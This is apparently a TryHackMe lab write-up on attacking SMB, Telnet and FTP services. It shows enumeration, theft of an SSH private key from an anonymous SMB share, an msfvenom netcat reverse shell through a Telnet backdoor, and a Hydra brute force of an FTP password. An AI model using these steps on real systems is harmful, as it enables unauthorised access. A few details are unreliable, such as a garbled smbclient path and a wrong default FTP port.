Network Services - Common Services
The link for this lab is located here: https://tryhackme.com/room/networkservices
This room explores common Network Service vulnerabilities and misconfigurations on services such as SMB, Telnet and FTP - both explaining and exploiting each service.
Task 2 - Understanding SMB
SMB (Server Message Block Protocol) is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources.
Servers make file systems and other resources available to clients on the network.
The SMB protocol is known as a response-request protocol, meaning it transmits multiple messages between client and server to establish a connection. Clients connect to servers using TCP/IP, NetBEUI or IPX/SPX.
How Does SMB Work?
Once the PCs have established a connection to the server, clients can then send commands (known as SMBs) to the server to allow them to do various things like access shares, open/read/write files and more.
What Runs SMB?
Windows OS since Windows 95 have included client and server SMB protocol support. Samba, an open source server that supports SMB protocol was released for Unix systems.
Questions
Q1: What does SMB stand for?
A: Server Message BlockQ2: What type of protocol is SMB?
A: Response-RequestQ3: What do clients connect to servers using?
A: TCP/IPQ4: What systems does Samba run on?
A: UnixTask 3 - Enumerating SMB
Enumeration is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation. Enumeration is ESSENTIAL for an attack to be successful - wasting time throwing exploits at a machine hoping it works is not worth it.
Enumeration can gather incredible amounts of information including:
usernames
passwords
network information
hostnames
application data
services
Typically, there are SMB share drives on a server that can be connected to and used to view or transfer files. SMB can often be great to look for sensitive information.
Port Scanning
First step in enumerating is conducting a port scan to find as much starting information about the services as possible - things like the services running, service versions and possibly OS can be detected.
In this room, we will use Nmap but feel free to use any other port scanner you are more comfortable with. For the initial scan, I will be using the Nmap switches “-A” which enables OS detection, version detection, script scanning and traceroute and “-p-” which will scan all 65535 ports.
Enum4Linux
Enum4Linux is a great tool used to enumerate SMB shares on Windows and Linux. It is essentially a wrapper around the tools in the Samba package and makes it easy to extract informaton from the target pertaining to SMB.
The syntax of Enum4Linux is very simple - enum4linux >options> <IP>
Some of the most useful operators are:
-U (get userlist)
-M (get machine list)
-N (get namelist dump)
-S (get sharelist)
-P (get password policy information)
-G (get group and member list)
-A (all of the above)
Questions
Q1: Conduct an nmap scan of your choosing. How many ports are open?
A: For my scan, I choose to do the following command "nmap -sS -A -p- -oA initial 10.10.28.183" which was a TCP SYN Scan, using the -A to get service version and OS detection mainly, "-p-" which specified all ports and "-oA initial" which outputted the result to all 3 formats (XML, Normal, Grepable)Q2: What port is SMB running on?
A: Reading the Nmap output, we see ports 139/445 are running instances of Samba smbd (also tells us the OS is Linux due to Samba)Q3: Conduct a full basic enumeration using Enum4Linux. What is the workgroup name?
A: Running the command "enum4linux -A 10.10.28.183" we get a very large output of information. Combing through it, we can see our WORKGROUP near the top. Remember that -A performs a full basic enumeration (userlist, machine list, sharelist, etc...)Q4: What comes up as the name of the machine?
A: Scrolling down our Enum4Linux output, we see the name of the machine in the section titled "OS Information". There is no label but highlighted in red will be our machine name.Q5: What operating system version is running?
A: This is in the same section - OS Information - and this time it is clearly labeled.Q6: What share sticks out as something we might want to investigate?
A: For us, when trying to gather information about a machine, one of the key resrouces we want to look for is usernames or possibly credentials. Under the "Share Enumeration" section you will see all the shares available on the machine. To us, the profiles share looks very intriguing.Task 4 - Exploiting SMB
While there are vulnerabilities such as CVE-2017-7494 that can allow remote code execution (RCE) by exploiting SMB, you are more likely to encounter a situation where the best way into a system is due to misconfigurations rather than outdated versions (although they do still occur!)
In the case of this room, we will exploit anonymous SMB shares which is a very common misconfiguration that can allow us to gain information that will lead to a shell - to learn more about anonymouse shares and SMB hacking, I’d recommend this website
Method Breakdown
From our enumeration stage, we know:
The SMB share location
The name of an interesting share (profiles)
SMBClient
SMBclient is a tool used to access SMB shares. It is pre-installed on Kali Linux and Parrot OS, but if you need to download it, you can find it here
We can remotely access the SMB share by using the syntax:
smbclient //<IP>/<SHARE>
Followed by the tags:
-U <name> (specifies the user)
-p <port> (specifies the port)
Questions
Q1: What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port?
A: First of all, we know that the default port for SMB is 445. The rest is the matter of substituting the credentials we know into the syntax specified above with the -U parameter for the user and -p parameter for the port - smbclient //10.10.10/2/secret -U suit -p 445Q3: Let's see if the interesting share (profiles) has been configured to allow anonymouse access via the username anonymous, the share of profiles and using no password. Does the share allow anonymouse access (Y/N)?
A: Refercing the command in the screenshot above, we know how to use smbclient to accomplish this. Simply change out the sharename from secret to profiles, change the name suit to Anonymouse and leave the default port. When prompted for the password, simply hit enter and you will be greeted with an SMB prompt - we have access!Q4: Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
A: The SMB prompt is very similiar to Linux with regards to commands. Typing "help" at the prompt will reveal all possible commands.There is an interesting text document. We can read it using the "more" command and then specifying the file name in quotation marks (because it has spaces) - more "Working From Home Information.txt"
We see that there are two possible names this folder can belong to - John Cactus and John. It is more likely that it is John Cactus this folder belongs to as he is the person being addressed in the SMB Share.
Q5: What service has been configured to allow him to work from home?
A: Reading the text document in the last question reveals that SSH access has been enabled on his account. SSH allows user to remotely access servers/workstations via credentials using cryptographic keys. It is the secure version of Telnet.Q6: Now we know this, what directory on the share should we look in?
A: We can determine that the folder we want is ".ssh" as it is the same name as the service configured for John Cactus. However, doing a quick Google search will lead us to more information about this folder - if you want more information, click hereQ7: This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
A: The ".ssh" directory contains two keys - a private (id_rsa) and public (id_rsa.pub). Anyone with a copy of the public key can encrypt data which can then only be read by the person who holds the corresponding private key. Therefore, the private key is the most important one to us (id_rsa)Q8: Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.
A: So, first we need to download the private key to our personal machine. We can do this various ways using various commands. However, there is a builtin SMB command called "get" that will download any specified file to our working directory.Next, we have to change permissions of the private key. SSH is very strict on the permissions of the private key and requires that only you have permissison to read or write to the file only (which would be permission 400 or 600 respectively). So, let's change the permissions to 600 before using it
Now that we have the RSA key and the right permissions, we need one more thing - the username. Now, there are two ways to do this. First, we could go through and guess all the common usernames for people - first-name, first-name-last-name, last-name, first-initial-last-name
However, there is a neat little trick here. If you go back to the SMB share and read the public key (id_rsa.pub) via the more command (more id_rsa.pub) you will actually see something very interesting at the end of the file
As you can see at the end, there is a username and hostname (cactus = username, polosmb = hostname). From this, we can determine that the username is cactus saving us some time. All that is left for us to do now is connect using the RSA key instead of a password and we will be in.
To connect using an RSA key to a remote host, we use the command "ssh -i id_rsa [username]@[ip]". The "-i" paramter specify the id_rsa key that we want to use. Knowing this, we can simply use the username of cactus and the IP of your target to connect.
As you can see we are now logged in. All that is left is to grab the flag. Doing a simple "ls" command will show a text file. Inside, you will find your flag for this task.
Task 5 - Understanding Telnet
Telnet is an application protocol which allows you to connect and execute commands on a remote machine hosting a Telnet server. The telnet client will establish a connection with the server. The client will then become a virtual terminal - allowing you to interact with the remote host.
Telnet however, sends ALL messages in clear text and has no specific security mechanisms. In many real-world environments, Telnet has been replaced by SSH
Telnet works by the user connecting to the server using the Telnet protocol which means entering “telnet” into a terminal. The user then executes commands on the server using specific Telnet commands in the Telnet prompt. To connect to a Telnet server you can use the syntax:
telnet <IP> <port>
Questions
Q1: What is Telnet?
A: Application ProtocolQ2: What has slowly replaced Telnet?
A: SSHQ3: How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?
A: We know looking above that the syntax is simply typing the telnet command with the IP first and the port second hence our command would be: telnet 10.10.10.3 23Q4: The lack of what, means that all Telnet communications is in plaintext?
A: EncryptionTask 6 - Enumerating Telnet
Again, the first step is doing a port scan to find out as much information about the services, applications, structure and possible OS of the target. As discussed in the “Enumerating SMB” section, I will be performing the following Nmap scan (feel free to run your own with different flags):
nmap -sS -A -p- -oA initial 10.10.197.79
Questions
Q1: How many ports are open on the target machine?
A: Running our scan and looking at the results, we can see that only 1 port is open - port 8012Q2: What port is this?
A: Looking at the results from Q1, we can see it is port 8012Q3: This port is unassigned but still lists the protocol it is using, what protocol is this?
A: Looking at the Nmap scan, next to the port number there is a "/" followed by the protocol in use. In this case, "/tcp"Q4: Now re-run the nmap scan without the "-p-" tag, how many ports show up as open?
A: Omitting the "-p-" will scan the 1000 most common ports by default. In this case, our scan will return with no open ports.Here we see that by assinging telnet to a non-standard port, it is NOT part of the most common ports. It is important to try every angle when enumerating!
Q6: Based on the title returned to us, what do we think this port could be used for?
A: Looking at the output, we see an interesting string - "SKIDY'S BACKDOOR" which seems unusual. A backdoor refers to any method by which authorized and unauthorized users are able to get around normal security measures and gain high level user access (aka root access) on a computer system, network, or software application.Q7: Who could it belong to?
A: The previous string - "SKIDY'S BACKDOOR" - seems to indicate that a user called Skidy executed a backdoor on this machine and is using it himself.Task 7 - Exploiting Telnet
Telnet is insecure for the lack of cryptrography - it sends all its communication over plaintext and also has poor access control. There are various CVE’s for Telnet client and server systems you could check on these sites:
A CVE (Common Vulnerabilities and Exposures) is a list of publicly disclosed computer security flaws. However, in the real world you are far more likely to find a misconfiguration in how it has been configured or is operating that will allow exploitation.
From the enumeration stage, we know:
There is a poorly hidden telnet service running
The service itself is a backdoor
Possible username of Skidy implicated
Using this information, we can connect to the Telnet port to maybe get a reverse shell on the machine. You can connect using Telnet via the following syntax:
telnet [ip] [port]
Before we run this, we need to discuss what a reverse shell is. A “shell” is simply described as a piece of code or program that can be used to gain code or command execution on a device.
A reverse shell is a type of shell in which the target communicates BACK to us on our machine. Our machine has a listening port on which it receives the connection resulting in code or command execution.
First, let’s connect using Telnet via the following command:
telnet 10.10.197.79 8012
Questions
Q2: We have an open telnet connection. What welcome message do we receive?
A: The very last sentence reveals our welcome message. In this case, it says "SKIDY'S BACKDOOR"Q3: Try executing some commands. Do we get a return on any input we enter into the telnet session (Y/N)?
A: Typing .HELP reveals something back to us. However, typing any other commands gives us nothing back. In this case, no return from our input is given back to us.Using the command "sudo tcpdump ip proto \\icmp -i tun0", we start our listener looking for ICMP traffic (pings).
Next, try pinging our local machine (my Kali's tun0 IP address) from the target machine using the .RUN command. - .RUN ping 10.11.3.112 -c 1 (the -c 1 only sends one ping).
As we can see, the listener succssfully picks responses from the target.
This means we can execute system commands and we can reach our local machine from the target.
Q6: Do we receive any pings?
A: Looking at the last step, we know we can ping our local machine from the target via the Telnet session so we do receive pings.Now, we can generate a reverse shell payload using msfvenom. This generates and encodes a netcat reverse shell for us. The syntax for this is as follows (your lhost IP will be different):
msfvenom -p cmd/unix/reverse_netcat lhost=10.11.3.112 lport=4444 R
Here is what it all means:
msfvenom (the tool to create custom payloads/shells)
-p (indicates our payload - in this case cmd/unix/reverse_netcat)
lhost (our machine’s IP address)
lport (port on OUR machine to listen for connections)
R (export the payload in raw format)
Q8: What word does the generated payload start with?
A: Running this msfvenom command reveals the full command that we can run on the target machine. As we can see, the first word is mkfifo.Next, we need to start a netcat listener on our local machine. This is the service that will “catch” the shell from the target machine when it connects back to our machine on the port we specified above (in my case, 4444). To run a netcat listener, we use the command
nc -lvp 4444
Where:
-l (stands for listen mode)
-v (means verbose output)
-p (specifies the port)
Q9: What would the command look like for the listening port?
A: We know that the syntax for the command is "nc -lvp [port number]" so our example would be "nc -lvp 4444"Now that our netcat listener is running waiting for a connection on port 4444, we can copy and paste the raw command from msfvenom (starting from mkfifo) into our Telnet session on the target machine. When ran, it should connect to our Kali machine on port 4444 and give us a shell.
Now that it is ran, we can check our netcat listener and we should see the target machine has connected to us.
Now, we can confirm who we are running as on this machine by typing the id
command.
Perfect. We are root!
Q11: What are the contents of the flag.txt file?
A: Doing a simple Linux command - ls - will reveal what is in this directory. There is a flag.txt file. Simply read the flag.txt file and you will get the flagTask 8 - Understanding FTP
FTP (File Transfer Protocol) is a protocol used to allow remote transfer of files over a network. It uses a client-server model and relays commands and data in an efficient way.
A typical FTP session operates using two channels:
a command or control channel
a data channel
Command channel is used for transmitting and replying to commands while the data channel is used for transferring data.
FTP clients initiate a connection with the server, the server validates the login credentials and then opens the session. When the session is open, the client may execute FTP commands on the server
FTP servers can support Active and Passive connections:
Active - client opens a port and listens. Server is required to actively connect to it
Passive - server opens a port and listens (passively) and client connects to it
The separation of channels is a way of being able to send commands without having to wait for the current data transfer to finish.
For more details on the technicalities of FTP, you can click here
Questions
Q1: What communications model does FTP use?
A: Client-ServerQ2: What is the standard FTP port?
A: 21Q3: How many modes of FTP connection are there?
A: 2 - Active and PassiveTask 9 - Enumerating FTP
By now, you should be comfortable to perform a port scan effectively. For this stage, we will exploit an anonymous FTP login to see what files we can access and if they contain any information that might be interesting.
It’s worth noting that some vulnerable versions of in.ftpd and other FTP server variants return different responses to the “cwd” command for home directories which exist and don’t exist.
These can be exploited because you can issue “cwd” commands before authentication and if there is a home directory, there is likely a user account to go with it. However, this bug is mainly found in legacy systems but still worth noting. You can read more about it here
Questions
Q1: How many ports are open on the target machine?
A: Using my trusty nmap scan (nmap -sS -A -p- -oA initial [IP]), we can that ports 21 and 80 are open.Q2: What port is FTP running on?
A: Looking at our output, we can see that port 21 is running FTP. Additionally, we know from above that port 12 is the default port for FTP.Q3: What variant of FTP is running?
A: Looking at the scan results for port 21, under the VERSION section, you will see the variant is vsftpd.Now we know what type of FTP server we are dealing with. Next step is to check if we are able to login anonymously to the FTP server. To do this, we use the simple syntax:
ftp [IP]
When prompted for a username, type “anonymous” and for the password use “anonymous” aswell. When logged in, you can type “help” to get a list of commands you can use (you’ll notice most of them are simple Linux commands)
Q4: What is the name of the file in the anonymous FTP directory?
A: Using the ls command, we can see there is a file in the directory called PUBLIC_NOTICE.txt.Q4: What do we think a possible username could be?
A: To read the file, we first need to download it to our local machine (good practice). This is possible with the "get" command followed by the filename - get PUBLIC_NOTICE.txt (transfer)It will download to the directory you started in when connecting to the FTP server. Once you are in that directory, you can simply "cat" out the file to read it locally. (mike)
After reading the file, we can see it is writing by mike - this could be the username on this machine.
Now that we have a possible username for the FTP server, we can possibly login or crack Mike’s password using Hydra.
Task 10 - Exploiting FTP
Similiar to Telnet, when using FTP the command and data channels are unencrypted. With data from FTP being sent in plaintext, if a Man in the Middle attack took place, an attacker could reveal anything sent (even passwords).
An amazing article written by JScape demonstrates and explains this using ARP Poisoning.
When looking at an FTP server from our position, an avenue we can exploit is weak or default passwords.
From our enumeration stage, we know the following:
There is an FTP server running
We have a possible username of mike
Using this information, we can try cracking the password of the FTP server using the mike username.
To crack a password, we can use a tool called Hydra. Hydra is an online password cracking tool which performs rapid dictionary attacks against more than 50 protocols including Telnet, HTTP, SMB and much more!
The syntax for using Hydra to bruteforce a password with a given username is the following:
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.176.18 ftp”
Note that you may not have rockyou.txt wordlist on your machine. This wordlist is VERY commonly used in CTFs and TryHackMe rooms so it is vital. IF you do not have it downloaded, you can find it here.
The syntax used above uses the following flags:
-t 4 (specifies the number of parallel connections per target)
-l [user] (username of person you are trying to crack)
-P [path to wordlist] (points to the wordlist you want to use)
-vV (sets verbose mode, shows every login+password combination)
[IP] (specifies target machine)
ftp (sets protocol to FTP)
Questions
Q1: What is the password for the user mike?
A: Using the command specified above on our attacking machine, it will run Hydra. After a couple of seconds, you will see a highlighted combination revealing the successful password for mike.Now that we have a username and password, we can once again connect to the machine using the ftp 10.10.176.18
command but this time using a username of mike and a password of password. Once logged in, we can list the files to see what there is in Mike’s directory.
Q3: What is ftp.txt?
A: Once again, we see that there is a file called "ftp.txt" located in this directory. We can download it using the "get ftp.txt" commandOnce downloaded, we can simply navigate to the directory it got downloaded to and "cat" it out to reveal our flag for this room.
Task 11 - Expanding Your Knowledge
And that’s it! You’ve successfully completed this room. Congratulations. If you want to expand your skills further, check our more TryHackMe rooms or check out some of the following links: